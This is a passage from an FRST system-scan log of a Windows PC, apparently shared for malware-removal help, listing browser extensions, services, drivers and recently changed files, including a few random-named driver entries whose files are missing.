CHR HKU\S-1-5-21-949114339-2066100574-2594248327-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [lmjegmlicamnimmfhcmpkclmigmmcbeh]
CHR HKLM-x32\...\Chrome\Extension: [daanglpcpkjjlkhcbladppjphglbigam]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - C:\Program Files (x86)\Adobe\Acrobat 11.0\Acrobat\Browser\WCChromeExtn\WCChromeExtn.crx [2012-09-23]
CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck]
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki]

Opera:
=======
OPR Profile: C:\Users\John\AppData\Roaming\Opera Software\Opera Stable [2023-11-23]
OPR DownloadDir: I:\stahovanie
OPR Notifications: Opera Stable -> hxxps://aternos.org; hxxps://forum24.os.tc; hxxps://mail.google.com; hxxps://meet.google.com; hxxps://opencsgo.com; hxxps://skinodds.com; hxxps://www.pvpro.com; hxxps://www.tipsport.sk
OPR DefaultSuggestURL: Opera Stable -> hxxps://www.google.com/complete/search?client=o ... utEncoding}
OPR Extension: (Custom Page Zoom) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\acfbkfekhjlboehfjgdidogogpbklcdm [2023-08-18]
OPR Extension: (AdNauseam) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\dklmdhmkdbinnceekhecifmjhiiabolp [2023-10-31]
OPR Extension: (Rich Hints Agent) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\enegjkbbakeegngfapepobipndnebkdk [2023-10-17]
OPR Extension: (Nimbus Screenshot & Screen Video Recorder) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\gjpihpkhgfngnbhhfdehlcmgfahbciip [2022-07-26]
OPR Extension: (Opera Wallet) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\gojhcdgcpbpfigcaejpfhfegekdgiblk [2023-11-10]
OPR Extension: (Twitch Now) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\hiahmjdojdodmjjhhddegdnhcpjmokmo [2021-06-20]
OPR Extension: (Scripter) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\hpochgedhgonjnpbepkbnkkibkjigknc [2021-09-08]
OPR Extension: (Aliexpress Search by image) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\jkcacbjiofjgbnaknoojjboeiinempoa [2021-11-03]
OPR Extension: (Deezer™ Downloader (Deezloader)) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\jnmflndddcmkajmkoahaenmnfbdckaom [2022-02-28]
OPR Extension: (Amazon Assistant Promotion) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\kbmoiomgmchbpihhdpabemajcbjpcijk [2021-08-14]
OPR Extension: (SessionBox - Multi login to any website) - C:\Users\John\AppData\Roaming\Opera Software\Opera Stable\Extensions\megbklhjamjbcafknkgmokldgolkdfig [2023-07-20]
StartMenuInternet: (HKLM) Opera GXStable - C:\Program Files\Opera GX\Launcher.exe

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [173040 2022-09-26] (Adobe Inc. -> Adobe Inc.)
S4 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [818128 2018-04-24] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
S4 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [2321384 2018-05-11] (Adobe Systems Incorporated -> Adobe Systems, Incorporated)
S4 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2128872 2018-05-11] (Adobe Systems Incorporated -> Adobe Systems, Incorporated)
S2 apacheds-default; C:\Program Files (x86)\ApacheDS\bin\wrapper.exe [204800 2020-02-28] () [File not signed]
S4 aswbIDSAgent; C:\Program Files\AVAST Software\Avast\aswidsagent.exe [8477080 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
S4 avast; C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [194200 2020-10-26] (Avast Software s.r.o. -> AVAST Software)
S4 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [621728 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
S4 avast! Tools; C:\Program Files\AVAST Software\Avast\aswToolsSvc.exe [351848 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
S4 avastm; C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [194200 2020-10-26] (Avast Software s.r.o. -> AVAST Software)
S4 AvastSecureBrowserElevationService; C:\Program Files (x86)\AVAST Software\Browser\Application\86.1.6960.198\elevation_service.exe [1136920 2020-11-13] (Avast Software s.r.o. -> AVAST Software)
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [8885112 2022-05-17] (BattlEye Innovations e.K. -> )
S4 CDROM_Detect; C:\Program Files\4G LTE Modem\4G_Server.exe [327680 2016-11-19] () [File not signed]
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [2776664 2015-08-16] (Microsoft Corporation -> Microsoft Corporation)
S3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusServiceLite.exe [1467072 2016-05-30] (Disc Soft Ltd -> Disc Soft Ltd)
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [1135648 2022-04-16] (EasyAntiCheat Oy -> Epic Games, Inc)
S3 EpicOnlineServices; C:\Program Files (x86)\Epic Games\Epic Online Services\service\EpicOnlineServicesHost.exe [16029472 2021-10-06] (Epic Games Inc. -> Epic Games, Inc.)
R2 EpsonScanSvc; C:\Windows\system32\EscSvc64.exe [206304 2021-03-31] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
R2 ewserver; C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Electrical\server\EwServer.exe [191664 2018-02-26] (Trace Software International -> )
S4 FACEITService; C:\Program Files\FACEIT AC\FACEITService.exe [20756320 2020-05-01] (FACE IT LIMITED -> )
S2 Freemake Improver; C:\ProgramData\Freemake\FreemakeUtilsService\FreemakeUtilsService.exe [82216 2021-02-17] (Mixbyte Inc -> Freemake)
R2 Hamachi2Svc; C:\Program Files (x86)\LogMeIn Hamachi\x64\hamachi-2.exe [3361736 2019-04-02] (LogMeIn, Inc. -> LogMeIn Inc.)
S4 HiPatchService; C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe [9728 2017-09-19] (Hi-Rez Studios) [File not signed]
S4 impi_hydra; C:\Program Files\Common Files\SolidWorks Shared\Simulation Worker Agent\hydra_service.exe [880296 2018-02-26] (Intel(R) Software Development Products -> Intel Corporation)
S4 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn Hamachi\x64\LMIGuardianSvc.exe [419248 2016-05-27] (LogMeIn, Inc. -> LogMeIn, Inc.)
S4 LogiRegistryService; C:\Program Files\Logitech Gaming Software\Drivers\APOService\LogiRegistryService.exe [193656 2016-03-30] (Logitech Inc -> Logitech Inc.)
S4 memcached; c:\memcached\memcached.exe [507640 2009-12-16] () [File not signed]
S4 MSSQL$TEW_SQLEXPRESS; C:\ProgramData\SOLIDWORKS Electrical\MSSQL12.TEW_SQLEXPRESS\MSSQL\Binn\sqlservr.exe [372416 2015-04-20] (Microsoft Corporation -> Microsoft Corporation)
S4 ProtonVPN Service; C:\Program Files (x86)\Proton Technologies\ProtonVPN\ProtonVPNService.exe [100672 2020-04-17] (ProtonVPN AG -> )
S4 ProtonVPN Update Service; C:\Program Files (x86)\Proton Technologies\ProtonVPN\ProtonVPN.UpdateService.exe [61760 2020-04-17] (ProtonVPN AG -> )
S4 QMEmulatorService; D:\Program Files\TxGameAssistant\AppMarket\QMEmulatorService.exe [166384 2019-12-20] (Tencent Technology(Shenzhen) Company Limited -> Tencent)
S4 Razer Game Scanner Service; C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe [189264 2016-09-25] (Razer USA Ltd. -> )
R2 RemoteSolverDispatcher; C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Flow Simulation\binCFW\remotesolverdispatcherservice.exe [264704 2018-02-26] (Mentor Graphics Corporation -> Mentor Graphics Corporation)
S3 Rockstar Service; C:\Program Files\Rockstar Games\Launcher\RockstarService.exe [2017072 2022-02-02] (Rockstar Games, Inc. -> Rockstar Games) [File not signed]
R2 SbieSvc; D:\windows programy\Sandboxie-Plus\SbieSvc.exe [363992 2022-08-29] (Tonalio GmbH -> Sandboxie-Plus.com)
R2 SolidWorks Licensing Service; C:\Program Files (x86)\Common Files\SolidWorks Shared\Service\SolidWorksLicensing.exe [79360 2018-05-27] (SolidWorks) [File not signed]
S4 SQLAgent$TEW_SQLEXPRESS; C:\ProgramData\SOLIDWORKS Electrical\MSSQL12.TEW_SQLEXPRESS\MSSQL\Binn\SQLAGENT.EXE [613056 2015-04-20] (Microsoft Corporation -> Microsoft Corporation)
R2 Synology Drive VSS Service x64; C:\Program Files (x86)\Synology\SynologyDrive\bin\vss-service-x64.exe [370824 2022-03-29] (Synology Inc. -> )
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [18035512 2023-10-18] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
S3 ucldr_battlegrounds_gl; C:\Program Files\Common Files\UNCHEATER\ucldr_battlegrounds_gl.exe [7099632 2021-07-21] (Wellbia.com Co., Ltd. -> Wellbia.com Co., Ltd.)
S4 uncheater_bgl; C:\Program Files\Common Files\Uncheater\uncheater_bgl.exe [2097008 2020-11-05] (Wellbia.com Co., Ltd. -> Wellbia.com Co., Ltd.)
S2 VBoxSDS; C:\Program Files\Oracle\VirtualBox\VBoxSDS.exe [746504 2020-10-16] (Oracle Corporation -> Oracle Corporation)
R2 vgc; C:\Program Files\Riot Vanguard\vgc.exe [10430256 2022-11-10] (Riot Games, Inc. -> Riot Games, Inc.)
R2 VMwareHostd; C:\Program Files (x86)\VMware\VMware Workstation\vmware-hostd.exe [15477208 2020-03-07] (VMware, Inc. -> )
S3 VSStandardCollectorService140; C:\Program Files (x86)\Microsoft Visual Studio 14.0\Team Tools\DiagnosticsHub\Collector\StandardCollector.Service.exe [56552 2016-03-22] (Microsoft Corporation -> Microsoft Corporation)
S3 VSStandardCollectorService150; C:\Program Files (x86)\Microsoft Visual Studio\Shared\Common\DiagnosticsHub.Collection.Service\StandardCollector.Service.exe [147392 2019-04-30] (Microsoft Corporation -> Microsoft Corporation)
S4 wampapache64; c:\wamp64\bin\apache\apache2.4.33\bin\httpd.exe [30720 2018-03-18] (Apache Software Foundation) [File not signed]
S4 wampmariadb64; c:\wamp64\bin\mariadb\mariadb10.2.14\bin\mysqld.exe [14550440 2018-03-26] (MariaDB Corporation Ab -> )
S4 wampmysqld64; c:\wamp64\bin\mysql\mysql5.7.21\bin\mysqld.exe [39551488 2017-12-28] () [File not signed]
R2 WebDriveService; C:\Program Files\WebDrive\wdService.exe [12388232 2019-12-20] (South River Technologies -> South River Technologies, Inc.)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Windows -> Microsoft Corporation)
S3 zksvc; C:\Program Files\Common Files\PUBG\zksvc.exe [7531208 2021-08-01] (PUBG CORPORATION -> PUBG Corporation)
S2 IpOverUsbSvc; "C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe" [X]
S2 SWVisualize2018.BoostService; "C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Visualize Boost\SWVisualize.BoostService.exe" [X]
S2 SWVisualize2018.Queue.Server; "C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Visualize\SWVisualize.Queue.Server.exe" [X]

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

U5 amdkmdap; C:\Windows\System32\Drivers\amdkmdap.sys [614280 2020-11-14] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
R3 asmthub3; C:\Windows\System32\DRIVERS\asmthub3.sys [140032 2013-08-16] (MCCI Corporation -> ASMedia Technology Inc)
R3 asmtxhci; C:\Windows\System32\DRIVERS\asmtxhci.sys [424192 2013-08-16] (MCCI Corporation -> ASMedia Technology Inc)
R0 aswArDisk; C:\Windows\System32\drivers\aswArDisk.sys [36792 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R1 aswArPot; C:\Windows\System32\drivers\aswArPot.sys [208672 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R1 aswbidsdriver; C:\Windows\System32\drivers\aswbidsdriver.sys [332880 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R0 aswbidsh; C:\Windows\System32\drivers\aswbidsh.sys [247888 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R0 aswbuniv; C:\Windows\System32\drivers\aswbuniv.sys [97360 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R1 aswKbd; C:\Windows\System32\drivers\aswKbd.sys [42424 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R1 aswMonFlt; C:\Windows\System32\drivers\aswMonFlt.sys [176384 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R1 aswNetHub; C:\Windows\System32\drivers\aswNetHub.sys [522480 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R3 aswNetNd6; C:\Windows\System32\DRIVERS\aswNetNd6.sys [38152 2020-04-15] (AVAST Software s.r.o. -> AVAST Software)
R1 aswRdr; C:\Windows\System32\drivers\aswRdr2.sys [108928 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R0 aswRvrt; C:\Windows\System32\drivers\aswRvrt.sys [84496 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R1 aswSnx; C:\Windows\System32\drivers\aswSnx.sys [851256 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R1 aswSP; C:\Windows\System32\drivers\aswSP.sys [469472 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R2 aswStm; C:\Windows\System32\drivers\aswStm.sys [216984 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
R0 aswVmm; C:\Windows\System32\drivers\aswVmm.sys [326064 2020-12-16] (Avast Software s.r.o. -> AVAST Software)
S3 CH341SER_A64; C:\Windows\System32\Drivers\CH341S64.SYS [58368 2009-06-02] (Microsoft Windows Hardware Compatibility Publisher -> www.winchiphead.com)
S3 CMUAC; C:\Windows\System32\DRIVERS\Headset6400x1.SYS [386560 2013-10-03] (C-MEDIA ELECTRONICS INC. -> A4Tech Inc.)
S3 CT_QUALCOMM_U_drv; C:\Windows\System32\DRIVERS\CT_QUALCOMM_U_drv.sys [118016 2009-04-27] (Microsoft Windows Hardware Compatibility Publisher -> QUALCOMM Incorporated)
R3 DroidCam; C:\Windows\System32\DRIVERS\droidcam.sys [31576 2020-04-24] (DEV47 APPS -> Dev47Apps)
R3 dtlitescsibus; C:\Windows\System32\DRIVERS\dtlitescsibus.sys [30264 2016-06-04] (Disc Soft Ltd -> Disc Soft Ltd)
R3 dtliteusbbus; C:\Windows\System32\DRIVERS\dtliteusbbus.sys [47672 2016-06-04] (Disc Soft Ltd -> Disc Soft Ltd)
R3 EuMusDesignVirtualAudioCableWdm; C:\Windows\System32\DRIVERS\vrtaucbl.sys [66728 2016-07-05] (NTONYX Ltd. -> Eugene V. Muzychenko)
R0 FACEIT; C:\Windows\System32\Drivers\FACEIT.sys [20193656 2020-05-01] (FACE IT LIMITED -> )
S3 ggsomc; C:\Windows\System32\DRIVERS\ggsomc.sys [32384 2018-05-03] (Sony Mobile Communications AB -> Sony Mobile Communications)
R1 gvm; C:\Windows\System32\DRIVERS\gvm.sys [393712 2020-09-22] (Google LLC -> Google LLC)
S3 HidNt; C:\Windows\System32\DRIVERS\HIDNt.sys [22576 2008-04-18] (Futime Manufacturing Ltd -> Microsoft Corporation) [File not signed]
S3 HidNt; C:\Windows\SysWOW64\DRIVERS\HIDNt.sys [18992 2008-04-18] (Futime Manufacturing Ltd -> Microsoft Corporation) [File not signed]
S3 IOMap; C:\Windows\system32\drivers\IOMap64.sys [24824 2014-10-23] (ASUSTeK Computer Inc. -> ASUSTeK Computer Inc.)
S3 KProcessHacker3; C:\Program Files\Process Hacker 2\kprocesshacker.sys [45208 2016-03-29] (Wen Jia Liu -> wj32)
R2 LdBoxDrv; C:\Program Files\dnplayerext2\LdBoxDrv.sys [319376 2020-06-18] (Shanghai Changzhi Network Technology Co., Ltd. -> Oracle Corporation)
R3 LGBusEnum; C:\Windows\System32\drivers\LGBusEnum.sys [37408 2015-06-11] (Microsoft Windows Hardware Compatibility Publisher -> Logitech Inc.)
R2 LGCoreTemp; C:\Program Files\Logitech Gaming Software\Drivers\LgCoreTemp\lgcoretemp.sys [14184 2015-06-21] (Logitech -> Logitech)
R3 LGJoyXlCore; C:\Windows\System32\drivers\LGJoyXlCore.sys [68384 2015-06-11] (Microsoft Windows Hardware Compatibility Publisher -> Logitech Inc.)
S3 LGVirHid; C:\Windows\System32\drivers\LGVirHid.sys [26912 2015-06-11] (Microsoft Windows Hardware Compatibility Publisher -> Logitech Inc.)
S3 libusbK; C:\Windows\System32\DRIVERS\libusbK.sys [47200 2018-07-23] (Travis Lee Robinson -> hxxp://libusb-win32.sourceforge.net)
R3 ManyCam; C:\Windows\System32\DRIVERS\mcvidrv.sys [42016 2013-11-27] (Visicom Media Inc. -> Visicom Media Inc.)
R3 mcaudrv_simple; C:\Windows\System32\drivers\mcaudrv_x64.sys [35232 2013-12-06] (Visicom Media Inc. -> Visicom Media Inc.)
S3 navagio; C:\Program Files\Common Files\PUBG\navagio.sys [3632840 2021-08-03] (PUBG CORPORATION -> )
R1 npcap; C:\Windows\System32\DRIVERS\npcap.sys [69432 2019-09-04] (Insecure.Com LLC -> Insecure.Com LLC.)
S3 ProtonVPNSplitTunnel; C:\Program Files (x86)\Proton Technologies\ProtonVPN\x64\Win7\ProtonVPN.SplitTunnelDriver.sys [22456 2020-01-15] (ProtonVPN AG -> Proton Technologies AG)
R0 PxHlpa64; C:\Windows\System32\Drivers\PxHlpa64.sys [56336 2012-06-22] (Corel Corporation -> Corel Corporation)
S4 RsFx0310; C:\Windows\System32\DRIVERS\RsFx0310.sys [249024 2015-04-20] (Microsoft Corporation -> Microsoft Corporation)
R3 RtlWlanu; C:\Windows\System32\DRIVERS\rtwlanu.sys [7947096 2019-05-08] (Realtek Semiconductor Corp. -> Realtek Semiconductor Corporation)
R3 rzendpt; C:\Windows\System32\DRIVERS\rzendpt.sys [51224 2016-05-12] (Razer USA Ltd. -> Razer Inc)
R2 rzpmgrk; C:\Windows\system32\drivers\rzpmgrk.sys [44144 2016-09-17] (Razer Inc. -> Razer, Inc.)
R2 rzpnk; C:\Windows\system32\drivers\rzpnk.sys [137840 2016-09-07] (Razer Inc. -> Razer, Inc.)
R3 SbieDrv; D:\windows programy\Sandboxie-Plus\SbieDrv.sys [249368 2022-08-29] (Microsoft Windows Hardware Compatibility Publisher -> Sandboxie-Plus.com)
R2 speedfan; C:\Windows\SysWOW64\speedfan.sys [28664 2012-12-29] (SOKNO S.R.L. -> Almico Software)
S3 tap0901; C:\Windows\System32\DRIVERS\tap0901.sys [40664 2015-02-03] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
R3 tapprotonvpn; C:\Windows\System32\DRIVERS\tapprotonvpn.sys [39864 2020-04-06] (ProtonVPN AG -> The OpenVPN Project)
R3 VBAudioVMAUXVAIOMME; C:\Windows\System32\DRIVERS\vbaudio_vmauxvaio64_win7.sys [41192 2019-01-06] (Vincent Burel -> Windows (R) Win 7 DDK provider)
R3 VBAudioVMVAIOMME; C:\Windows\System32\DRIVERS\vbaudio_vmvaio64_win7.sys [41192 2019-01-05] (Vincent Burel -> Windows (R) Win 7 DDK provider)
R3 VBoxNetAdp; C:\Windows\System32\DRIVERS\VBoxNetAdp6.sys [239432 2020-10-16] (Oracle Corporation -> Oracle Corporation)
R1 VBoxNetLwf; C:\Windows\System32\DRIVERS\VBoxNetLwf.sys [249344 2020-10-16] (Oracle Corporation -> Oracle Corporation)
S3 VBoxUSB; C:\Windows\System32\Drivers\VBoxUSB.sys [135768 2016-06-28] (Oracle Corporation -> Oracle Corporation)
R1 vgk; C:\Program Files\Riot Vanguard\vgk.sys [22216888 2022-11-10] (Riot Games, Inc. -> Riot Games, Inc.)
R1 vmkbd3; C:\Windows\System32\DRIVERS\vmkbd.sys [52288 2020-03-07] (VMware, Inc. -> VMware, Inc.)
R2 VMnetBridge; C:\Windows\System32\DRIVERS\vmnetbridge.sys [66368 2020-03-07] (VMware, Inc. -> VMware, Inc.)
R3 VOICEMOD_Driver; C:\Windows\System32\drivers\vmdrv.sys [31744 2021-12-28] (Voicemod Sociedad Limitada -> Windows (R) Win 7 DDK provider)
R0 vsock; C:\Windows\System32\DRIVERS\vsock.sys [103736 2019-08-14] (VMware, Inc. -> VMware, Inc.)
R2 vstor2-mntapi20-shared; C:\Windows\SysWow64\drivers\vstor2-x64.sys [52576 2018-02-28] (VMware, Inc. -> VMware, Inc.)
S3 wdm_usb; C:\Windows\System32\DRIVERS\usb2ser.sys [159936 2016-08-16] (NGO -> MBB)
R2 WebDriveFSD; C:\Program Files\WebDrive\wdfsd.sys [108960 2018-09-25] (South River Technologies -> South River Technologies, Inc.)
R3 wovad_micarray; C:\Windows\System32\drivers\womic.sys [35696 2017-11-25] (Beijing Wolicheng Technology Co., Ltd. -> Windows (R) Win 7 DDK provider)
S3 cqwzjpilmi; \??\C:\Windows\xdmkcicuts.sys [X]
S3 glavcam; system32\DRIVERS\glavcam.sys [X]
S3 Mac606; system32\DRIVERS\Mac606.sys [X]
S3 qmeyutfnfe; \??\C:\Windows\eqyvkatwim.sys [X]
S3 rxyfbwoazs; \??\C:\Windows\kytgzgrgpv.sys [X]
S3 USBAAPL64; System32\Drivers\usbaapl64.sys [X]
S3 xhunter1; \??\C:\Windows\xhunter1.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) (Whitelisted) =========

(If an entry is included in the fixlist, the file/folder will be moved.)

2023-11-23 19:29 - 2023-11-23 19:29 - 002383872 _____ (Farbar) C:\Users\John\Downloads\FRST64.exe
2023-11-23 19:27 - 2023-11-23 19:27 - 000000021 _____ C:\Users\John\Desktop\forum viry ucet.txt
2023-11-22 15:23 - 2023-11-22 15:23 - 012383864 _____ (Tim Kosse) C:\Users\John\Downloads\FileZilla_3.66.1_win64-setup.exe
2023-11-22 03:28 - 2023-11-22 03:28 - 000000089 _____ C:\Users\John\Desktop\txt.txt
2023-11-20 22:32 - 2023-11-22 11:41 - 000000131 _____ C:\Users\John\Desktop\praxe chill.txt
2023-11-18 21:58 - 2023-11-18 21:58 - 000731283 _____ C:\Users\John\Downloads\F3-BP-2015-Skrivan-Jaroslav-Bakalarka.pdf
2023-11-18 21:55 - 2023-11-18 21:55 - 000051947 _____ C:\Users\John\Downloads\white-paper-php-performance-checklist.pdf
2023-11-18 21:02 - 2023-11-18 21:02 - 001282692 _____ C:\Users\John\Downloads\Server-Side_Lookup_Optimization_of_A_Web_Service.pdf
2023-11-16 18:50 - 2023-11-16 18:50 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TP-Link
2023-11-16 18:49 - 2023-11-16 18:49 - 000000000 ____D C:\Program Files (x86)\TP-Link
2023-11-16 18:49 - 2019-05-08 03:23 - 007947096 _____ (Realtek Semiconductor Corporation ) C:\Windows\system32\rtwlanu.sys
2023-11-16 18:49 - 2019-05-08 03:23 - 007947096 _____ (Realtek Semiconductor Corporation ) C:\Windows\system32\Drivers\rtwlanu.sys
2023-11-16 18:49 - 2019-05-08 03:23 - 001185504 _____ (Realtek Semiconductor Corp. ) C:\Windows\system32\Rtlihvs.dll
2023-11-16 18:49 - 2019-05-08 03:23 - 000114920 _____ (Realtek Semiconductor Corp. ) C:\Windows\system32\RtlExtUI.dll
2023-11-16 18:49 - 2019-05-08 03:23 - 000049384 _____ (Windows (R) Server 2003 DDK provider) C:\Windows\system32\rtlCoInst.dll
2023-11-16 18:48 - 2023-11-16 18:49 - 000000000 ____D C:\Users\John\AppData\Local\TP-Link
2023-11-16 18:48 - 2023-11-16 18:48 - 000000000 ____D C:\ProgramData\TP-Link
2023-11-15 08:15 - 2023-11-14 14:28 - 000587065 _____ C:\Users\John\cviko2_231004.ipynb
2023-11-15 08:15 - 2023-11-14 14:28 - 000447921 _____ C:\Users\John\cviko231018.ipynb
2023-11-15 08:15 - 2023-11-14 14:27 - 000629594 _____ C:\Users\John\cviko20231108.ipynb
2023-11-15 08:15 - 2023-11-14 14:27 - 000317529 _____ C:\Users\John\Untitled1.ipynb
2023-11-13 17:48 - 2023-11-13 17:48 - 000001366 _____ C:\Users\John\Desktop\team1 laravel.ffs_gui
2023-11-11 15:50 - 2023-11-11 15:50 - 000000000 ____D C:\Users\John\.mputils
2023-11-10 09:40 - 2023-11-10 09:40 - 000262144 _____ C:\Windows\Minidump\111023-100277-01.dmp
2023-11-07 01:17 - 2023-11-07 01:17 - 000001057 _____ C:\Users\John\Desktop\WinHugs.lnk
2023-11-07 01:17 - 2023-11-07 01:17 - 000000000 ____D C:\Users\John\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinHugs
2023-11-07 01:15 - 2023-11-07 01:17 - 000000000 ____D C:\Program Files (x86)\WinHugs
2023-11-03 17:27 - 2023-11-03 17:27 - 000002468 _____ C:\Users\John\Desktop\moje upraveny arduno.txt
2023-11-03 12:46 - 2023-11-03 12:21 - 000006143 _____ C:\HTTPClient.cpp
2023-11-03 12:46 - 2023-10-31 21:58 - 000001218 _____ C:\HTTPClient.h
2023-11-03 12:46 - 2023-10-26 13:56 - 000001987 _____ C:\wifly_http.ino
2023-11-03 12:46 - 2023-10-26 13:56 - 000000182 _____ C:\Debug.h
2023-11-02 03:24 - 2023-11-02 03:24 - 003243838 _____ C:\Users\John\Desktop\lol ucet.psd
2023-11-01 13:36 - 2023-11-01 13:36 - 000000339 _____ C:\Users\John\Desktop\nove regexy pre opgg.txt
2023-10-26 19:17 - 2023-10-26 19:23 - 000000000 ____D C:\Users\John\AppData\Local\playit_gg
2023-10-26 19:17 - 2023-10-26 19:17 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Playit.gg
2023-10-26 13:50 - 2023-11-09 09:37 - 000000000 ____D C:\Users\John\AppData\Local\Arduino15
2023-10-26 13:50 - 2023-10-26 13:57 - 000000000 ____D C:\Users\John\Documents\Arduino
2023-10-26 13:49 - 2023-10-26 13:49 - 000000833 _____ C:\Users\Public\Desktop\Arduino.lnk
2023-10-26 13:49 - 2023-10-26 13:49 - 000000833 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Arduino.lnk

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2023-11-23 19:50 - 2018-05-27 13:28 - 000047522 _____ C:\Users\John\Downloads\FRST.txt
2023-11-23 19:50 - 2017-02-03 15:18 - 000000000 ____D C:\FRST
2023-11-23 19:41 - 2020-07-28 11:17 - 000000000 ____D C:\Users\John\AppData\Local\Discord
2023-11-23 19:32 - 2016-06-05 17:45 - 000000000 ____D C:\Users\John\AppData\Roaming\TS3Client
2023-11-23 18:10 - 2022-09-30 08:56 - 000000000 ____D C:\Users\John\AppData\Roaming\superProductivity
2023-11-23 15:35 - 2018-06-28 19:47 - 000000000 ____D C:\Users\John\AppData\Local\LogMeIn Hamachi
2023-11-23 11:58 - 2017-02-21 16:47 - 000000000 ____D C:\Users\John\AppData\Roaming\obs-studio
2023-11-23 11:40 - 2018-07-28 23:15 - 000000000 ____D C:\Users\John\AppData\Roaming\discord
2023-11-23 10:41 - 2009-07-14 05:45 - 000026576 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2023-11-23 10:41 - 2009-07-14 05:45 - 000026576 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2023-11-23 10:36 - 2020-04-15 23:16 - 000000001 _____ C:\Windows\vgkbootstatus.dat
2023-11-23 10:36 - 2009-07-14 06:13 - 001061310 _____ C:\Windows\system32\PerfStringBackup.INI
2023-11-23 10:36 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\inf
2023-11-23 10:35 - 2017-06-12 11:10 - 000000000 ____D C:\ProgramData\VMware
2023-11-23 10:35 - 2016-06-04 15:16 - 000000000 ____D C:\Program Files (x86)\Google
2023-11-23 10:32 - 2021-07-29 08:59 - 000000400 __RSH C:\ProgramData\ntuser.pol
2023-11-23 10:31 - 2020-11-29 22:35 - 000000000 ____D C:\ProgramData\VirtualBox
2023-11-23 10:31 - 2019-02-03 09:09 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2023-11-23 10:31 - 2009-07-14 06:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2023-11-23 02:21 - 2016-06-04 16:02 - 000065536 _____ C:\Windows\system32\spu_storage.bin
2023-11-22 21:38 - 2016-09-10 17:45 - 000000000 ____D C:\Program Files (x86)\Opera
